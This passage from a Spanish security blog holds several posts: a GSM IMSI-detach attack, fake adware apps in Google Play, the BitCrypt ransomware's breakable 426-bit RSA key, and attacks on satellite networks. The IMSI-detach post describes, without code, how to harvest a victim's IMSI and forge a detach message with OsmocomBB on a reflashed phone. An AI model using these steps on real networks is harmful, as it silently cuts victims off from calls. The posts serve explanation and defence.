Random Access Channel). La red asigna un canal dedicado a la MS (SDCCH, Stand-alone Dedicated Control Channel) y se lo notifica con un mensaje de asignación de canal. Una vez el canal está establecido, la MS envía un mensaje IMSI attach request hacia la estación base, que lo reenvía al MSC y después al VLR. El VLR marca el IMSI como attached y envía un mensaje IMSI attach acknowledge al MSC, que lo redirige de vuelta a la BS y por tanto a la MS. El MSC envía un mensaje Clear Command para forzar la liberación del canal SDCCH asignado a la MS. IMSI attach procedure. Fuente: www.iosrjen.org IMSI detach procedure El proceso contrario, en el que una MS "sale" de la red, se conoce como IMSI detach procedure, y es la clave de este ataque. Se produce en dos casos: si se apaga el terminal móvil o si se extrae la SIM. Al igual que en el IMSI attach, cuando se produce este evento el VLR marca a la MS con el flag detached, indicando que ya no es alcanzable por la red. Cuando una MS está detached, no puede transmitir, recibir... ni tampoco recibe los mensajes broadcast de paging de las estaciones base. De esta manera, la red no desperdicia recursos intentando contactar con MS apagadas. El procedimiento consta de unos pasos equivalentes a los del IMSI attach: Al apagarse la MS envía una petición de asignación de canal dedicado a través del RACH. La BS asigna un canal dedicado (SDCCH) a la MS y se lo notifica a través del canal AGCH (Access Grant Channel). Con el canal ya establecido la MS envía un IMSI detach request a la estación base, que lo reenvía al núcleo de la red. El VLR actualiza el flag, y notifica al HLR que el terminal móvil ya no está registrado mediante un mensaje Deregister Mobile Subscriber. El HLR marca la MS como “no registrada” y contesta al VLR con un “Deregistration Accepted”. El VLR envía un mensaje IMSI detach acknowledge de vuelta al MSC. Este mensaje no se retransmite a la MS, porque en este punto ya se habrá apagado. Por último, el MSC envía un Clear Command para liberar el canal SDCCH asignado a la MS. IMSI detach procedure. Fuente: www.iosrjen.org La técnica de ataque El primer punto crítico es que el atacante necesita conocer el IMSI de la víctima. Para ello puede valerse de la infraestructura descrita en el post de ataques MITM: con una estación base falsa a modo de IMSI catcher, el atacante puede elaborar listas de IMSIs en varias localizaciones donde tenga la certeza de que se encuentra el usuario y cruzarlas posteriormente para determinar el IMSI deseado. Aunque siempre existe la alternativa (mucho más sencilla) de utilizar un servicio online que permita consultar HLRs. Servicio de consulta de HLRs de telesigmobile.com. Fuente: coseinc.com Superada esta dificultad, el siguiente paso consiste en suplantar el móvil de la víctima frente a la red. Esto requiere una mínima inversión y algunos conocimientos técnicos. Para la parte software se utiliza la herramienta libre OsmocomBB, que corre sobre Linux, y en cuanto al hardware basta con disponer de un terminal móvil con procesador de banda base Calypso y chipsets Rita e Iota para demodulación y conversión DA (por ejemplo los Motorola modelo Cxxx, aunque hay más terminales compatibles). Placa de circuito impreso de un Motorola C123. Fuente: bb.osmocom.org La idea es sustituir el firmware del teléfono con la pila de protocolos GSM modificada que implementa OsmocomBB. Las modificaciones que incluye permiten establecer canales de control, inyectar información de señalización en ellos (justo lo que el atacante quiere en este caso), y por supuesto generar tráfico de voz y datos. Una vez el atacante ha configurado correctamente su infraestructura, debe desplazarse al mismo Location Area (conjunto de celdas gestionadas por un mismo VLR) donde se encuentra la víctima. En este momento, el VLR de esa LA tiene marcado el IMSI de la víctima como attached. El atacante, con su móvil correctamente caracterizado, fuerza el envío de un mensaje IMSI detach. El VLR recibe el mensaje y cambia el flag del IMSI de la víctima a detached. Además, el HLR marca la MS como "no registrada", con lo que ya no recibirá mensajes de paging de la red. La víctima en ningún momento es consciente del ataque, puesto que como hemos visto, el IMSI detach aknowledge nunca se retransmite hacia su MS, sino que se queda en el MSC porque se da por supuesto que la MS estará ya apagada. Al llegar a este punto, la víctima quedará sin cobertura, por estar "apagada" a ojos de la red... y no podrá enviar ni recibir llamadas. En este vídeo, el propio descubridor del problema expone el fallo (en 41 minutos) en la DeepSec de 2010. Cristóbal Bordiú cristobal.bordiu@11paths.com
31 de marzo de 2014
El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad
Seguimos observando las apps falsas en Google Play. En esta entrada estudiaremos qué políticas establece Google para utilizar su market y qué rentabilidad podrían conseguir los atacantes. Esta clasificación tampoco pretende ser demasiado rigurosa puesto que algunas de las técnicas son totalmente opacas y además van cambiando periódicamente. La política de Google Play Para analizar el alcance del problema real que pueden suponer estas "FakeApps", es necesario tener en cuenta muchos factores. Por ejemplo, entender la política de Google Play. En su market, cualquiera puede subir una aplicación (previo pago de unos 20 euros) sin demasiadas comprobaciones burocráticas o, al menos, mucho más relajadas que las que realizan otros. Esto convierte a Google Play en una store que, aunque oficial, no ofrece mucha resistencia desde el punto de vista legal (no es necesario demostrar ser una empresa o una entidad) e inevitablemente se presta al abuso. Desde le punto de vista técnico (automatizado), han implementado otras medidas. Se han puesto en marcha varios mecanismos que, como cualquier método "desatendido", sufre limitaciones. El problema de base sigue estando ahí, y es que cualquiera con una cuenta y de forma muy sencilla y sin costes significativos, puede subir aplicaciones. Sería equiparable al funcionamiento del buscador Google en la Internet "habitual": se puede publicar cualquier cosa en Internet con un coste muy bajo, y Google se encarga de mostrarlo "sin prejuicios" hasta que por alguna razón decida que no debe aparecer entre sus resultados (con lo que se puede dar por desaparecido). En resumen, se trata de un comportamiento reactivo que encasilla a Google Play en un modelo de lista negra. Los markets para Apple o Windows, por ejemplo, funcionan con una filosofía totalmente opuesta. Burocrácticamente (e incluso económicamente) resulta más difícil subir una aplicación, y si se cuela alguna maliciosa ( algo que ha ocurrido más de una vez , pero de forma anecdótica en comparación), se ponen en marcha sistemas de "limpieza". Google solo los aplica "a posteriori". ¿Es rentable el negocio? En resumen, Google prefiere dejar las puertas abiertas, y realizar trabajos de limpieza más intensos, algo condenado al fracaso puesto que al final, se expone durante un tiempo al usuario. ¿Ese riesgo es real? Como ya hemos mencionado, según Google, el nivel de aplicaciones fraudulentas que finalmente llegan a instalarse "es mínimo". Esto es bastante discutible. Es probable que muchos de estos intentos de los atacantes no tengan demasiado éxito... pero otros muchos sí. Desde luego, a los que utilizan la estrategia de las FakeApps para instalar adware sí les merece la pena. El razonamiento es simple: Crean cuentas a diario (a veces hasta dos y tres diferentes) lo que supone una inversión de 20 euros cada una. Las apps (y las cuentas) son retiradas entre 24 y 48 horas después de ser subidas. Dependiendo de su sutileza, a veces permanecen más tiempo. Cada instalación o click posterior suelen ganar unos céntimos. Cuando más agresiva la publicidad, más le pagan por cada instalación. En la imagen de más abajo se puede observar a un usuario hablando de cuánto puede llegar a ganar por instalación o click. Esta estrategia es seguida por decenas de desarrolladores a diario, desde hace mucho tiempo. Un usuario explica en un foro cuánto gana añadiendo adware muy agresivo a sus apps Tras observar este comportamiento entre muchos "desarrolladores" durante un largo periodo, se podría concluir que la actividad es rentable y que la inversión inicial merece la pena incluso si se trata de poco más de un céntimo por instalación. Para conseguir esa rentabilidad, esto se traduce en muchas instalaciones a diario. La relación entre la inversión en tiempo para subir el malware o adware y el beneficio obtenido parece, al menos, rentable. Otro ejemplo claro del "éxito" es el indicador de instalaciones de Google Play. Puede que a veces resulte extrañamente alto para aplicaciones falsas con adware o fraudes que han permanecido apenas unas horas en el market. Ejemplo en móvil de Whatsapp falso (aunque el nombre y fabricante estén muy conseguidos). El número de descargas y valoraciones es muy elevado. Se mantuvo unas 40 horas online Obviamente, no todas las descargas ni votaciones que aparecen en las imágenes significan infecciones reales. Primero por las propias defensas del teléfono y algunos antivirus instalados, que detendrán la instalación antes de que suceda (aunque no la descarga). También, sobre todo, porque los atacantes engordan las descargas y las votaciones artificialmente. Saben que es un indicador de confianza para el usuario y lo usan como ingeniería social. Una buena parte de esas votaciones falsas las realizan los propios usuarios infectados, como veremos más adelante. Así, podremos observar aplicaciones fake, con muchos comentarios negativos, pero también con muchas valoraciones "5 estrellas". Ejemplo de una alta valoración en apenas unas horas para un juego falso que simulaba ser Candy Crush, impuesta por los propios usuarios que son incitados a valorarla con 5 estrellas antes de jugar (cosa que nunca ocurre) En la próxima entrega veremos qué técnicas de limpieza técnica utiliza Google, y qué políticas ha puesto en marcha en el último año. * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
24 de marzo de 2014
BitCrypt y el malware fácil de descifrar (II): El porqué
El ransomware ha venido para quedarse. Existen fundamentalmente dos tipos: los que bloquean el acceso al sistema (que populariza todavía el "virus de la policía") y los que (incluso adicionalmente) cifran los contenidos. En ambos casos, el negocio se basa en pedir un "rescate" (bien por el control, bien por el contenido). En esta entrada se relatará técnica y matemáticamente el funcionamiento de uno de ellos, bitCrypt y cómo (y por qué) un error de cálculo ha permitido descifrar el contenido de los archivos que "secuestra". Un rápido repaso al RSA BitCrypt alardea de usar claves RSA de 1024. RSA es un algoritmo criptográfico de clave asimétrica, basado en una clave pública y en una privada (también un algoritmo de firma). Los parámetros necesarios que configuran este sistema se resumen como sigue: m = número que representa el mensaje original que se desea cifrar. c = mensaje cifrado. n = pq = módulo para las claves. p, q = factores de n. e = clave pública o exponente público. d = clave privada o exponente privado. Para llevar a cabo la operación de cifrado se realiza el siguiente cálculo: De la misma forma, para descifrar se utiliza: Finalmente, se deben considerar las siguientes observaciones: BitCrypt también dice que usa el RSA para cifrar la clave AES. Respecto a AES, únicamente mencionar que es un algoritmo de cifrado simétrico (usa la misma clave para cifrar y descifrar) con un tamaño de bloque fijo de 128 bits y variable de la clave entre 128 y 256 bits. Es bastante robusto y eficiente. Cómo lo hace BitCrypt Repasemos los pasos: En primer lugar se genera una contraseña aleatoria para el archivo actual que será utilizada posteriormente por AES. Se cifra con AES todo el fichero original con la contraseña anterior y se añade la extensión .bitcrypt. Seguidamente se cifra con RSA la contraseña utilizada y se anexa al final del fichero. Junto con esto, se guarda información importante para el descifrado como el módulo de la clave pública (n), que se almacena codificada en algo que parece base64, pero no es más que un alfabeto de sustitución. El exponente público utilizado es siempre el mismo (el típico 0x10001). El uso tan frecuente de este valor se debe principalmente a la eficiencia de la exponenciación, llevada a cabo mediante 16 desplazamientos de bits a la izquierda sumando 1. Además, este número es lo suficientemente grande para evitar problemas con implementaciones incorrectas que no hagan un buen uso del padding. En Cassidian Ciberscurity, analizaron los ficheros afectados y se dieron cuenta de que no era cierto lo indicado en la información proporcionada sobre el uso de RSA de 1024. La verdad era que se estaba utilizando RSA 426, lo que modificaba completamente el panorama. Al usar una clave tan corta resulta factible abordar su factorización, "rompiendo" por fuerza bruta el cifrado RSA. De hecho, la longitud mínima de n recomendada hoy en día es de 2048 bits. Sabiendo que los atacantes usan criptografía fuerte, pero con claves débiles, ¿cómo (en la teoría) se produciría la ruptura? Cómo se rompen las claves RSA El objetivo de los algoritmos que intentar romper RSA consiste en determinar los valores correspondientes a los números d, p y q desconocidos en un comienzo. Una vez tengamos estos datos en nuestras manos se podría llevar a cabo el proceso de descifrado explicado anteriormente y recuperar por tanto el mensaje original. Sin embargo, generalmente no resulta computacionalmente factible obtener estos valores. Lo más cómodo sería conseguir d, por lo que se hace uso de la observación 2 de RSA: Por tanto, el objetivo principal se resume en resolver un problema de factorización de grandes números, es decir, encontrar los valores de p y q tales que satisfagan n = pq. Para ello usaron CADO-NFS. La manera en la que el algoritmo CADO-NFS se encarga de romper el proceso de cifrado RSA utilizado por bitCrypt se basa en hacer cálculos matemáticos para llegar a encontrar la factorización (p y q) del número n (módulo utilizado en el algoritmo RSA). En el caso de un módulo de 426 bits, tardará un promedio de unas 14 horas en un servidor de 24 núcleos y unas 43 horas en un ordenador doméstico de 4 núcleos. Comparado con los cientos o incluso miles de años que necesitaríamos para factorizar una clave de mayor tamaño, el método deja la puerta abierta a la recuperación de los archivos más importantes para los afectados por esta versión del troyano. Las instrucciones para conseguirlo pasan por utilizar este script. Una vez encontrados p y q se obtiene el exponente privado d y se puede recuperar la contraseña aleatoria utilizada por AES que había sido cifrada con RSA de 426 bits anteriormente. Siguiendo los pasos del proceso de descifrado fichero a fichero se puede obtener la información original. * BitCrypt y el malware fácil de descifrar (I): El qué Julia Llanos julia.llanos@11paths.com
14 de marzo de 2014
BitCrypt y el malware fácil de descifrar (I): El qué
El ransomware ha venido para quedarse. Existen fundamentalmente dos tipos: los que bloquean el acceso al sistema (que populariza todavía el "virus de la policía") y los que (incluso adicionalmente) cifran los contenidos. En ambos casos, el negocio se basa en pedir un "rescate" (bien por el control, bien por el contenido). En esta entrada se relatará técnica y matemáticamente el funcionamiento de uno de ellos, bitCrypt y cómo (y por qué) un error de cálculo permite descifrar el contenido de los archivos que "secuestra". El ransomware está de moda por varias razones. Es relativamente sencillo de programar para los atacantes. No requiere de grandes privilegios en el sistema (principal problema para muchos creadores de malware gracias a la popularidad de Windows 7 y 8) y permite "tener el control" aunque no sea a bajo nivel del sistema operativo. Porque aun sin ser administrador de la máquina, el usuario infectado siempre tendrá acceso a lo que más le duele: sus documentos, fotografías y archivos personales. Ha demostrado ser muy eficaz. Mucho ransomware apela a un potencial sentimiento de culpa del usuario ("en este ordenador se han encontrado archivos pirata", o "se han detectado actividad ilegal"...) y con ello han conseguido que muchas víctimas prefieran pagar, antes de (quizás) reconocer ciertas acusaciones como verdaderas. Además existen decenas de variantes y características. Como ejemplo reciente de malware que se puede considerar ransomware, (pero que ni cifra ni bloquea) en febrero de 2014 surgió Linkup. Se reconoce como el primer troyano ransomware basado en la modificación de la configuración del DNS, bloqueando así la conexión a Internet. Se pedía un rescate simbólico de 1 céntimo a través de una tarjeta de crédito, cuyos datos seguramente serían usados posteriormente para hacer fraude bancario. Para colmo, se ponía a minar bitcoins. Aunque ya se conocen de sobra los DNSchangers (que en vez de secuestrar desviaban el tráfico), esta variante toma "lo mejor de los dos mundos". BitCrypt Mensaje que aparece prometiendo una solución una vez se ha pagado el rescate BitCrypt no resulta en esencia una gran novedad. Hablamos de él como excusa para repasar la criptografía. Surgido también en febrero de 2014, cifra los archivos del sistema infectado y abre un fichero de texto (bitcrypt.txt) que contiene las instrucciones para recuperar la información. Acepta solo bitcoins y la página de rescate se muestra como una empresa "salvadora" del desastre que sufre la víctima (obviando el pequeño detalle de que el problema lo ha generado ella misma). Si llama la atención este malware no es por su modo de operar (clásico) sino por un error criptográfico interesante. Cómo funciona El mensaje que abre bitCrypt. En él se observa que habla de claves de 1024 bits, y ofrece un ID En el fichero de instrucciones se alerta de que los archivos están cifrados mediante RSA con clave de 1024 bits y los pasos que hay que seguir para recuperarlos. También, el identificador necesario para pagar, porque cada usuario afectado generará una clave de cifrado diferente. Nos proponen acceder a la dirección www.bitcrypt.info o alternativamente a unas direcciones de la red TOR, (por si dejaran de tener acceso a ese dominio, cosa que ya ha ocurrido). En esta página se introduce el identificador proporcionado y después el "wallet" para transferir el importe en bitcoins del rescate (0,4 bitcoins, aproximadamente 260 euros en esas fechas). Una página muy "profesional" que ofrece la solución a "BitCrypt software" Incluso cuenta con soporte online Una vez finalizados estos pasos y verificado el pago, se supone que se facilita un programa encargado de recuperarlos. En el equipo, el malware crea un fichero de configuración (bitcrypt.ccw), evita la ejecución del administrador de tareas y el editor de registro de Windows y cifra todos los archivos con extensiones consideradas interesantes para la mayoría de usuarios (documentos de Word, Excel, bases de datos, comprimidos, imágenes... incluso los javascript....) utilizando para ello los datos del identificador como módulo de la clave pública de RSA. El malware cifra usando una combinación de criptografía simétrica y asimétrica. Entraremos en los detalles matemáticos en la próxima entrada. Lo interesante es que observando un fichero cifrado cualquiera, lo primero que llama la atención es que aunque en el mensaje de advertencia se habla de un cifrado RSA con clave 1024 bits... esto no parece del todo cierto. Cassidian Cibersecurity, descubrió el problema. Solo hay que observar detenidamente la longitud para comprobarlo. Veamos este ejemplo real de clave pública, extraída de un fichero infectado: Ejemplos de ficheros cifrados a la izquierda, y uno de ellos abierto a la derecha, con detalle de clave pública Fow7VwXer4QLrVghntG8qHlM+21u7KgS1291XY8akfjQ4lsVAojqBeW+mh3Bwk12hsGtkFU Aunque parece base64, no lo es. Acudimos a este script en python realizado para la ocasión, que traduce la clave a bits (6 bits por cada "letra" de su alfabeto), lo que hace un total de 71 * 6 = 426 bits. Si modificamos un poco el script para que muestre la clave decodificada en binario, se observa perfectamente. Script ligeramente modificado para que muestre la clave en bits, y se compruebe su tamaño real (426 bits) Así que parece que la clave no es de 1024 bits, como afirmaban los atacantes, sino de 426. ¿Qué supone esto y cuál es el problema exactamente? Lo veremos en la siguiente entrada. * BitCrypt y el malware fácil de descifrar (II): El porqué Julia Llanos julia.llanos@11paths.com Sergio de los Santos ssantos@11paths.com @ssantosv
12 de marzo de 2014
El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias
Seguimos observando las apps falsas en Google Play. En esta entrada estudiaremos qué aplicaciones son las que más se "simulan". Esta clasificación tampoco pretende ser demasiado rigurosa ni exhaustiva puesto que las modas y las circunstancias van cambiando periódicamente. Sí que puede llegar a r eflejar la tendencia del último trimestre de 2013, periodo durante el que se ha desarrollado el estudio principalmente. Fundamentalmente, los atacantes se basan en tres pilares para saber qué aplicaciones falsificar: Aplicaciones de pago que se ofrecen supuestamente gratis. Es el caso de, una de las más deseadas es Minecraft Pocket Edition, sin duda la más imitada durante meses y uno de los baluartes de los atacantes. La original cuesta 5,49 euros. App de Wreck-it Ralph falsa (a la derecha), que pretende imitar a la oficial de pago (a la izquierda) Aplicaciones que estuvieron disponibles oficialmente en Google Play hace tiempo, pero ya no aparecen (han sido expulsadas por políticas de uso u otras razones). Adblock Plus es un buen ejemplo. Los usuarios siguen buscándolas en el market oficial, y ahí es donde encuentran a sus víctimas despistadas. Ejemplos de Adblock falso y Tubemate Falso en Google Play Una de las más imitadas y usadas como reclamo son las aplicaciones que están a punto de salir para la plataforma Android. Es el caso de Clash of Clans. Durante 2013 se bombardeó Google Play con réplicas falsas de este juego. Finalmente se hizo oficial su aparición en Google Play el 1 de octubre. Igual ocurrió durante ese verano con Blackberry Messenger. Aplicaciones muy populares. Obviamente, los atacantes usan la imagen de apps muy populares como reclamo. Es el caso de WhatsApp (donde un día se pudieron contar cerca de 30 falsificaciones subidas concurrentemente), GTA, Pinterest, Flappy Birds, Candy Crash... Ejemplo de varias apps falsas de Pinterest, colgadas por un fabricante fraudulento Real Racing 3 y app de Los Simpsons falsas, creadas por un mismo fabricante fraudulento Aplicaciones que solo están disponibles para iPhone. Un reclamo son las apps que solo están disponibles para "la competencia" y puede que un futuro (o no) se programen en Android. Un claro ejemplo son Clumsy Ninja o Quiz Up. Quiz Up es una app popular en iPhone, pero no disponible para Android Clumsy Ninja se puede encontrar en Apple Store, pero no en Android. Mucho menos su inexistente (hasta la fecha), segunda versión Sospechosos habituales En general, los "sospechosos habituales" (esto es, las apps más populares del momento y muy suplantadas) son cambiantes. Durante el tiempo de este estudio y de forma habitual, destacan especialmente los siguientes. Tubemate Youtube Downloader: Es una aplicación "rechazada" por Google Play que, por tanto, debe ser descargada e instalada desde otras fuentes. También es muy deseada, y por tanto un gancho fácil para quien desconozca que oficialmente no puede encontrarse en el market oficial pero la busque ahí. Aviso oficial de la app TubeMate, advirtiendo de las apps falsas imitándola Aptoide: Una aplicación para crear un market propio. Tampoco puede encontrarse oficialmente en Goolge Play, sin embargo, no es difícil encontrar fakes. Dos ejemplos e Aptoides falsos en Google Play BlackMart Alpha: Una aplicación que dice que descarga aplicaciones de pago gratis. Obviamente no debe estar en Google Play. Un ejemplo de BlackMart Alpha en Google Play Hay Day, Clash of Clans, Infitnity Blade III y Plant vs Zombies 2...: Las primeras del mismo fabricante (Supercell). Clash of clans está disponible en Google Play solo desde el 1 de octubre de 2013. Ejemplo de varios Clash of Clans, TubeMate y Minecraft falsos en Google Play, un día cualquiera de finales de 2013 Ejemplo de Plants vs. Zombies 2 falso que permite grabar sonido BBM, BlackBerry Messenger. Un "clásico". Su entrada en Google Play era muy esperada. Ya hace unos meses se encontraron aplicaciones falsas que simulaban ser BBM messenger, pero durante el mes de septiembre y octubre de 2013 la expectación ante su inminente aparición oficial aumentaba entre los usuarios, lo que disparó el número de apps falsas que decían serlo días antes de estar oficialmente disponible. Durante estos meses, muchos atacantes han centrado su gancho en ella. Con esta "lista de deseos" de los usuarios, entre apps populares y esperadas, el atacante detalla un plan. Habitualmente, lo que hacen es que un mismo atacante sube un conjunto de estas aplicaciones falsas "sospechosos habituales" con ligeros cambios en el nombre una y otra vez, en grupos, aunque todas suelen ser más o menos el mismo adware, sin importar muy bien contra quién intenta realizar la suplantación. Así consiguen un mayor éxito, centrándose en el conjunto de aplicaciones "estrella" del momento, subiéndolas todas diariamente o cada vez que son retiradas. Estos son algunos de los ejemplos de lotes de aplicaciones falsas agrupadas por "falso fabricante". Este falso fabricante (aunque detrás se encuentra un mismo atacante o grupo) subía a diario estos lotes. Observando el conjunto, se puede completar una buena parte de los títulos de apps más falsificados durante los últimos meses. Ejemplos de diferentes fabricantes, durante diferentes días, que imitaban un buen número de apps falsas o bien aún no disponibles oficialmente en Google Play * El negocio de las "FakeApps" y el malware en Google Play (I): Introducción * El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
10 de marzo de 2014
Ataques contra redes de satélites (y II)
Los sistemas satelitales juegan un papel clave a nivel mundial, porque facilitan la transmisión de información a todos los rincones del planeta, y esto influye tanto en el aspecto económico, como social, político y militar. Como consecuencia de la gran dependencia que se ha desarrollado hacia las tecnologías vía satélite garantizar la seguridad de su infraestructura es una cuestión vital. No conviene olvidar que a pesar de situarse a miles de kilómetros sobre nuestras cabezas, las redes de satélites son tan vulnerables como cualquier otra red de comunicaciones. Veamos otros tipos de ataque posibles. Hijacking (secuestro de la señal) Este ataque está especialmente ligado a las transmisiones de "broadcast" y a las conexiones de Internet vía satélite. Los atacantes buscan hacer uso del satélite para transmitir su propia información, eliminando o alterando la información legítima. Llevar a cabo este ataque no requiere una infraestructura demasiado costosa, siendo relativamente sencillo obtener el software y el hardware necesarios. El caso de hijacking satelital por antonomasia es el del Capitán Midnight, cuando en 1986 un ingeniero electrónico de Florida se hizo con el control de la señal de un satélite de la cadena de televisión HBO e hizo que en las pantallas de los espectadores se imprimiese un mensaje en el que se quejaba del precio de la suscripción. Mensaje del "Capitán Midnight" (Fuente: wikipedia) Otro peculiar caso de secuestro más reciente ocurrió en 2013, cuando una televisión local de Montana causó un gran revuelo al emitir una transmisión de emergencia anunciando un supuesto apocalipsis zombi. Control total del satélite Podría resultar en el más peligroso, porque además de comprometer la integridad de la información, también pone en riesgo la integridad del satélite en sí. Este ataque requiere conocimientos y equipo especializados, puesto que es necesario interrumpir el enlace entre la estación TT&C y el satélite. En el caso de los satélites militares no siempre es posible. El motivo es que en la mayoría de los casos la estación TT&C se encuentra en el interior de bases militares, y acceder a ellas físicamente supone el mayor obstáculo para los atacantes. En cambio, si se trata de tomar el control de un satélite comercial, el escenario es menos exigente. Si un atacante toma el control completo de un satélite, puede hacer prácticamente de todo: desde variar ligeramente su órbita hasta forzar su reentrada en la atmósfera. Son pocos los casos confirmados de ataques de este tipo, siendo el más conocido el del satélite ROSAT. En 1998, uno de los propulsores de este satélite germano-estadounidense se activó a la máxima potencia. Como resultado, el satélite giró sin control y su cámara de alta resolución quedó expuesta directamente a la radiación solar. Quedó inutilizada. Investigaciones posteriores de la NASA determinaron que ciertos atacantes rusos habían burlado la seguridad del Goddard Space Flight Center y causado el incidente. Redes críticas, también con vulnerabilidades Actualmente existen más de un millar de satélites operacionales, pertenecientes a medio centenar de estados y organismos internacionales. Representan una infraestructura crítica de la que depende una gran parte del equilibrio económico y social del mundo. Necesitamos más que nunca las redes de satélites. Podemos concluir que un ataque persistente sobre ellas podría tener consecuencias desastrosas. Así que no se deben infravalorar las vulnerabilidades que presentan estos sistemas, ni olvidar la inversión necesaria para preservar su seguridad. * Ataques contra redes de satélites (I) Cristóbal Bordiú cristobal.bordiu@11paths.com
3 de marzo de 2014
Ataques contra redes de satélites (I)
Los sistemas satelitales juegan un papel clave a nivel mundial, porque facilitan la transmisión de información a todo el planeta y esto influye tanto en el aspecto económico, como social, político y militar. Como consecuencia de la gran dependencia que se ha desarrollado hacia las tecnologías vía satélite, garantizar la seguridad de su infraestructura es una cuestión vital. No conviene olvidar que, a pesar de situarse a miles de kilómetros sobre nuestras cabezas, las redes de satélites son tan vulnerables como cualquier otra red de comunicaciones. Ideas preliminares Antes de profundizar en los ataques que pueden sufrir, es conveniente conocer algunas ideas básicas relacionadas con las redes de satélites. A pesar de existir distintas topologías, la estructura más habitual de un sistema de comunicaciones vía satélite incluye los siguientes elementos: Uno o más satélites de comunicaciones, que no son más que repetidores radioeléctricos situados en el espacio que reciben señales desde un punto de la Tierra y las reenvían a otro. Un centro de control TT&C (Tracking, Telemetry and Control). Es una estación en tierra que se ocupa de la gestión y monitorización de la posición y rendimiento del satélite. Una o varias estaciones de comunicaciones que realizan las funciones de transmisión/recepción de los datos y actúan de interfaz con otras redes de comunicaciones (por ejemplo Internet). Dispositivos de usuario, tales como equipos comerciales que hacen uso del enlace descendente para recibir información, como por ejemplo los dispositivos de navegación GPS o las antenas parabólicas de televisión por satélite. Elementos de una red satelital. Fuente: http://www.netcomsec.co.jp/ Distinguiremos entre cuatro tipos de ataque contra redes satelitales, y añadiremos algún caso histórico en el que haya sido pública la perpetración con éxito del ataque descrito. Denegación de servicio ("jamming") La naturaleza radioeléctrica y la capacidad de "broadcast" del medio de transmisión hacen que este ataque sea uno de los más factibles. La idea sobre la que se basa es muy sencilla: emitir una señal no deseada (por ejemplo, ruido blanco) con la suficiente potencia como para saturar la porción del espectro radioeléctrico que utiliza el satélite objetivo. El alcance del ataque y su dificultad están relacionados. Atacar el enlace descendente es relativamente sencillo, pues basta con conocer la frecuencia de emisión del satélite y disponer de una antena directiva con la que apuntar al receptor para inhabilitarlo. Sin embargo, con esta técnica el atacante tan solo puede dejar fuera de servicio a una pequeña fracción de los usuarios del sistema. Si por el contrario se ataca el enlace ascendente (lo que es más difícil, ya que requiere conocimiento de la posición del satélite y una potencia de emisión mucho mayor), se puede dejar sin servicio a todos los usuarios de la red. A lo largo de la historia se han documentado numerosos casos de "jamming" a satélites, muchos de ellos en el ámbito de la llamada "ciberguerra". Por ejemplo, en el año 2000, durante unas maniobras de entrenamiento en Grecia, tanques británicos y estadounidenses tuvieron graves problemas de navegación. Investigaciones posteriores revelaron que una agencia de seguridad francesa fue responsable del incidente, utilizando dispositivos situados sobre el terreno para realizar jamming a la señal GPS. En 2003, Cuba e Irán colaboraron para bloquear las transmisiones del Telstar-12, un satélite comercial estadounidense situado en órbita geoestacionaria sobre el Atlántico. En 2005, el gobierno Libio ordenó un ataque de "jamming" contra dos satélites de comunicaciones, interrumpiendo servicios de televisión en Europa e interfiriendo comunicaciones militares estadounidenses. Captura de tráfico Con un presupuesto relativamente bajo, un atacante puede adquirir el equipo necesario para realizar "eavesdropping" en comunicaciones vía satélite. El ejemplo más frecuente y conocido es la recepción ilegal de televisión por satélite. El grado de dificultad que conlleva montar una antena receptora "pirata" es mínimo. Pero existen más alternativas, mucho más peligrosas. Las llamadas telefónicas vía satélite. Si bien hoy en día son menos frecuentes gracias al uso de cables submarinos, están expuestas a escuchas ilegales, por lo que resulta fundamental cifrar las comunicaciones. En el ámbito militar el panorama es aún más grave. Multitud de transmisiones militares vía satélite son sensibles al "eavesdropping". En 2009, insurgentes afganos e iraquíes lograron capturar vídeos grabados por drones "Predator" que se transmitían en claro hacia el satélite, usando como única herramienta SkyGrabber, un software comercial de la empresa rusa SkySoftware que cuesta tan solo 26 dólares. Esquema de comunicación estación terrena - dron - satélite. Fuente: http://www.nasa.gov/ Continuaremos en la siguiente entrega, hablando del secuestro de la comunicación o de cómo se puede llegar a tomar el control completo de un satélite. * Ataques contra redes de satélites (y II) Cristóbal Bordiú cristobal.bordiu@11paths.com
27 de febrero de 2014
El negocio de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes"
¿Qué tipo de "malware" encontramos en Google Play? Ante esta discusión sobre niveles de infección que presentábamos en una entrada anterior, no es sencillo saber quién tiene razón. Lo primero que habría que definir es qué es malware exactamente, al menos en el contexto de Google Play. Seguimos observando las apps falsas en Google Play. En esta entrada estudiaremos una posible clasificación del "fakes" que se puede encontrar en el market oficial, junto con algunos ejemplos. Esta clasificación no pretende ser demasiado rigurosa ni exhaustiva puesto que se basa más en el "aspecto" que pueden adoptar las apps falsas que en lo que pueden llegar conseguir en el teléfono. En estos casos, su objetivo suele ser siempre conseguir descargas oportunistas, rápidas y lucrativas. Normalmente intentan la instalación en el teléfono (aunque sea efímera) y que esto le permita al menos ser pagado por instalación de un paquete de publicidad, u obtener datos relevantes. Troyanos (bancarios o no) Se podría incluir aquí el concepto de malware de Windows trasladado a Android. Esto, aunque parezca muy amplio, quiere decir que se traslada el concepto de lucro despiadado a través del robo de datos, suplantación de apps bancarias, phishing... También los hay incluso que intentan infectar Windows a través del teléfono y viceversa 